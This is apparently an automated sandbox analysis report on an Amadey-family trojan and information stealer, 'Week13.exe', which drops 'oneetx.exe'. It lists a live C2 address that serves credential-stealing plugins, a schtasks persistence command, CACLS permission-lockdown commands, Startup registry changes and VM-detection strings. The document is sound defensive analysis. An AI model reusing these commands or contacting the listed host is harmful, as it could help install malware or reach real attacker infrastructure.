                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/Plugins/cred64.dll
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/Plugins/cred64.dll-
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/Plugins/cred64.dll1
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/Plugins/cred64.dll;
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/Plugins/cred64.dll?
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/Plugins/cred64.dllal
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/Plugins/cred64.dllmingM
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4210344439.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4210344439.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.php
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.php2465a8e1dc15491b69b82f20
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.php4~
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.php5a2ab05
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.php9
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phpSf7XJqPNYA2AOsO34i0TH=
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phpX
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phpb
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phpcoded
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phph
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phpp
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phpp#
                  Source: Week13.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.spyw.winEXE@26/6@0/1
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeFile created: C:\Users\user\AppData\Roaming\006700e5a2ab05Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4916:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                  Source: C:\Users\user\Desktop\Week13.exeFile created: C:\Users\user\AppData\Local\Temp\cb7ae701b3Jump to behavior
                  Source: Week13.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Week13.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Week13.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\Desktop\Week13.exeFile read: C:\Users\user\Desktop\Week13.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Week13.exe "C:\Users\user\Desktop\Week13.exe"
                  Source: C:\Users\user\Desktop\Week13.exeProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&Exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:R" /E
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:N"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:R" /E
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Source: C:\Users\user\Desktop\Week13.exeProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /FJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&ExitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:R" /EJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:N"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:R" /EJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{515980c3-57fe-4c1e-a561-730dd256ab98}\InprocServer32Jump to behavior
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Week13.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: Week13.exe, oneetx.exe.0.dr
                  Source: Binary string: dey\Release\Amadey.pdb source: Week13.exe, 00000000.00000002.1756030969.0000000006740000.00000004.00000020.00020000.00000000.sdmp
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Persistence and Installation Behavior

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: oneetx.exe PID: 6384, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Week13.exeFile created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"
                  Source: C:\Users\user\Desktop\Week13.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeWindow / User API: threadDelayed 3177Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeWindow / User API: threadDelayed 6707Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6412Thread sleep count: 3177 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6412Thread sleep time: -95310000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6272Thread sleep time: -50000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6916Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6412Thread sleep count: 6707 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6412Thread sleep time: -201210000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Week13.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeThread delayed: delay time: 50000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeThread delayed: delay time: 30000Jump to behavior
                  Source: Week13.exe, 00000000.00000002.1752698188.00000000009C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\Week13.exeProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /FJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&ExitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:R" /EJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:N"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:R" /EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeQueries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeQueries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformationJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: oneetx.exe PID: 6384, type: MEMORYSTR
                  Source: Yara matchFile source: Week13.exe, type: SAMPLE
                  Source: Yara matchFile source: 00000014.00000000.3695875286.0000000000441000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1758679775.0000000000441000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.1746271067.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3096531866.0000000000441000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.1751724718.0000000000441000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000000.3095824549.0000000000441000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000000.2495480705.0000000000441000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1754885360.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3696620232.0000000000441000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000000.1757106688.0000000000441000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1907375916.0000000000441000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
